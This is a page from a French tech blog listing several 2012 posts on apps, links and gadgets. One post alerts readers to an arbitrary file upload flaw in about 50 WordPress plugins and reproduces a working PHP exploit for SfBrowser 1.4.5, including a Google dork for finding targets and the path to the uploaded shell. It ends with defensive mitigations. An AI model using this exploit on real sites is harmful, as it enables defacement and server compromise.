Entrez vos identifiants

x
OU
Vous avez oublié votre mot de passe ?
Utilisateur wiki : vous n'aviez pas d'email ?

Korben - Site d'actualité geek et tech

Go Top
  • Articles populaires

  •  
  • Univers Populaires

  • Inscrivez-vous à la newsletter

  • DANS TON CHAT (BASHFR)

    <ghostix> moi, c la tuture a papas et maman
    <LSDark> pourquoi t'as mis un s à papa ?

    -- http://danstonchat.com/3509.html
  • Inscrivez vous aux bon plans

  • RSS Emplois sécurité

  • Site hébergé par
    Agarik Sponsor Korben
  • RSS Offres d’emploi

  • Les articles dans "Google"

    FreeOTP – Une application mobile d’authentification en 2 étapes

    3

    FreeOTP – Une application mobile d’authentification en 2 étapes

    Si vous êtes un fondu d'authentification en 2 étapes, mais que le client Android proposé par Google ne vous convient pas, voici une alternative elle aussi libre, portée par la communauté Fedora.

    Cela s'appelle FreeOTP et ça exploite les standards OTP (One-time Password Protocols) que sont HTOP et TOTP. C'est bien sûr compatible avec tous les services qui font de l'authentification en 2 étapes (Gmail, Dropbox...etc.).

    Les services peuvent être ajoutés simplement en scannant un QR Code ou manuellement.

    freeotpunnamed FreeOTP   Une application mobile dauthentification en 2 étapes

    A télécharger ici pour iOS et ici pour Android.

    Bon lundi à tous + 18 liens tout à fait exceptionnels !

    35

    Bon lundi à tous + 18 liens tout à fait exceptionnels !

    Salut les copains,

    bon, c'est lundi et à l'heure où vous lirez cet article, je serai en route pour Londres. Je manquerai donc de temps pour faire quelques articles sympas mais comme je vous aime gros comme ça, j'ai quand même compilé une bonne grosse liste de liens que j'avais prévu de traiter sous la forme d'articles, pour les 3 jours qui viennent !

    Bonne régalade à tous !

    1. Le Top 5 des malwares sur Android.
    2. 10 applets pour Ubuntu à tester
    3. Microsoft envisage de lancer d'ici 2013 des lunettes Kinect pour sa Xbox 720, concurrentes directes des Google Glasses
    4. Une taxe pour les utilisateurs d'Internet Explorer ? Ahahaha, n'importe quoi.
    5. Un script Perl pour scanner votre serveur à la recherche de failles.
    6. Il faut rendre les données maintenant... Va-t-on pouvoir récupérer nos DivX?  Ahahaha.
    7. Un making of du Retour du Jedi tourné en 1982.
    8. Fiddler 2 : Un outil pour Windows qui permet d'analyser les trames d'une application + ses extensions
    9. Songbird 2.0 et sa version pour Android viennent de sortir
    10. L'Europe débloque un budget de 3 millions d'euros pour lutter contre la cyber censure.
    11. Modifier les paramètres cachés de iTunes sous OSX.
    12. Les prédictions de Ray Bradbury qui se sont réalisées.
    13. Combien de temps avant que les VPN ne deviennent illégaux ?
    14. CookieSpy : Pour voir les cookies qui sont enregistrés dans votre système Windows sur tous les navigateurs.
    15. Un lecteur de BD pour Linux
    16. Plus de répertoire Public chez Dropbox.
    17. La carte des réseaux sociaux.
    18. DropSpot : Un outil pour transférer facilement et over the air, des fichiers entre un téléphone Android et votre ordinateur.

    La suite demain...

    Photo

    Par amour du Rugby [Sponsor]

    12

    Par amour du Rugby [Sponsor]

    La Société Générale vient de sortir sur Android une petite application très sympathique pour tous les fans de Rugby. Afin de fêter ses 25 ans de soutien au Rugby, vous pouvez télécharger gratuitement sur Google Play, AmouRugby qui vous permettra de faire 2 choses très sympathiques.

    La première fonctionnalité propose de rentrer dans les vestiaires, et de voir la photo que vous trouverez dans l'Équipe de cette semaine, s'animer sous vos yeux ébahit. De la réalité augmentée plutôt bien pensée qu'on devrait voir un peu plus souvent, plutôt que les QR codes tout moches.

    2012 06 11 10.43.25 Par amour du Rugby [Sponsor]

    L'autre fonctionnalité va permettre aux fans de se la raconter auprès de leurs amis. En effet, AmouRugby vous propose de poser avec vos joueurs préférés. A vous de choisir 3 joueurs parmi Serge Blanco, Abdelatif Benazzi, Serge Betsen, Christian Califano, Vincent Clerc, Christophe Dominici, Raphael Ibanez, Yannick Jauzion, Christophe Lamaison, Olivier Magne, Christian Marconnet, Lionel Nallet, Émile Ntamack, Fabien Pelous, Olivier Roumat et Philippe Sella. Clic-clac et voilà le résultat !

    2012 06 11 00.04.03 Par amour du Rugby [Sponsor]

    2012 06 11 00.06.43 Par amour du Rugby [Sponsor]

    Bon, j'ai dû ruser, car je n'avais personne pour me prendre en photo à ce moment-là, mais c'est plutôt bien fait et il est possible de déplacer les joueurs pour les positionner correctement sur l'image.

    Si ça vous branche d'essayer tout ça, AmouRugby est dispo ici.

    Alerte – 50 plugins WordPress troués !

    25

    Alerte – 50 plugins WordPress troués !

    Je viens de recevoir par email un adviso de la société Seraum spécialisée en sécurité informatique, qui a mis au jour une faille critique permettant l'upload de fichiers dans plus de 50 plugins WordPress. Du coup, c'est important que vous soyez au courant que si vous utilisez un de ces plugins, vous pouvez vous faire défacer en 2 secondes par un script kiddy qui n'aurait pas école aujourd'hui.

    • Homepage slideshow
    • 3D banner rotator
    • - Nmedia User File Uploader
    • - Front end upload
    • - Poverplay gallery
    • - WordPress Accordion Gallery
    • - Wp superb slideshow
    • - Wp-Property
    • - Video Gallery 1.3
    • - HTML5 Av Manager
    • - Royal Gallery
    • - 3D Flick Slideshow
    • - Image News Slider
    • - RBX Gallery
    • - wp-gpx-map
    • - File groups
    • - User Meta
    • - SfBrowser
    • - WPStoreCart
    • - Hungred Post Thumbnail
    • - MM Forms Community
    • - Tinymce Remind
    • - Gallery
    • - Thinkun Remind
    • - Foxypress
    • - PDW File Browser
    • - VideoWhisper
    • - WordPress Font Uploader
    • - FCChat Widget
    • - Comment Extra Fields
    • - Nmedia WordPress Member Conversation
    • - PictureSurf Gallery
    • - Really simple Gallery (probably vuln)
    • - PICA Photo Gallery
    • - Asset Manager
    • - Vertical slideshow
    • - Carousel slideshow
    • - Front file manager
    • - Omni secure files
    • - Mac photo gallery
    • - Smart slideshow
    • - Bliss Galery
    • - YASS
    • - Catpro Gallery
    • - Matrix Gallery
    • - Gallery Explorer
    • - Dreamwork Gallery
    • - Blaze slideshow
    • - Slideshow pro

    Voici l'exploit en question appliqué à l'un de ces plugins :

    ###########################################################
    #
    # Exploit Title: WordPress SfBrowser Version 1.4.5 Arbitrary File Upload
    # Google Dork: inurl:wp-content/plugins/sfbrowser/connectors/php/
    # Date: 11/06/2012
    # Exploit Author: Adrien Thierry
    # Vendor Homepage: http://www.sjeiti.com/
    # Software Link: http://downloads.wordpress.org/plugin/sfbrowser.zip
    # Version: 1.4.5
    #
    ###########################################################

    Vuln page : http://mysite.com/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php

    exploit :

    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.ptxt";
    $c = curl_init("http://127.0.0.1/wp/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php");
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('fileToUpload'=>"@$u",
    'a'=>"upload",
    'file'=>"",
    'deny'=>"lam",
    'allow'=>"ptxt|exe|sh",
    'resize'=>array(0,0)));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e;
    ?>

    shell Access : http://mysite.com/wp-content/plugins/sfbrowser/shell.ptxt

    Pour se protéger, plusieurs possibilités à part virer le plugin vulnérable:

    • Placer un fichier .htaccess dans les dossiers de plugin
    • Placer des index.php vides dans les dossiers qui n'en ont pas
    • Inclure un appel aux variables ABSPATH ou session admin au début de chaque script php

    Quand les dev font de la merde, les admins trinquent ;-)

    Bonne sécurisation à tous !

    Merci à Adrien Thierry, l'auteur de cet exploit de m'avoir informé.

    Il y a aussi ce site, learn to secure your WordPress Installation

    Android Play Store – Télécharger les APK non compatibles avec votre téléphone

    20

    Android Play Store – Télécharger les APK non compatibles avec votre téléphone

    Parfois, il arrive que l'Android Market nous jette parce qu'on n'a pas le téléphone qui va bien pour profiter de telle ou telle application. Il s'agit d'une limitation imposée qui permet d'éviter que des logiciels plantent ou fonctionnent mal sur certains appareils. Mais si vous voulez passer outre et quand même installer l'application interdite sur votre téléphoné supposée non compatible, il existe une solution.

    Ça s'appelle APK downloader, et c'est une extension pour Chrome, qui lorsque vous vous rendez sur le Play Store avec votre ordinateur, téléchargera directement le .apk. Vous pourrez alors ensuite transférer ce .apk sur votre téléphone et l'installer normalement. Attention, il ne s'agit pas ici de pirater le Play Store. Ça ne fonctionne qu'avec des applications déjà accessibles gratuitement.

    Pour en savoir plus, télécharger l'extension Chrome et lire les explications pour l'installer, c'est sur ce site que ça se passe.

    Merci à Koenigbook pour l'info

    Transformez votre voiture en Google Car

    12

    Transformez votre voiture en Google Car

    Tiens, voilà un kit vendu ici qui risque d'intéresser les afficionados d'OpenStreetMap qui est l'alternative libre à Google Maps, Bing Maps et maintenant Apple Maps. Dans ce kit, tout le matos et les logiciels nécessaires pour transformer votre voiture en Google Street View Car.

    cap 2012 06 12 a 10.27.28 Transformez votre voiture en Google Car

    L'appareil est bien sûr équipé d'un GPS, et dispose de 6 objectifs capable de faire un panoramique de 7500x3750 pixels. A noter que ce système peut aussi être monté sur un genre de sac à dos pour photographier des endroits inaccessibles aux 4 roues. Pour voir ce que ça donne en terme de résultat, c'est par ici.

    Formidable non ? Je pense que ce genre de matos dont on ne connait pas encore le prix, devrait intéresser les mairies, les offices de tourisme et nos amis d'IGN.

    Source

    En ce moment dans l'univers "Vidéos"

    Voir tous les articles »

    En ce moment dans l'univers "Windows"

    Voir tous les articles »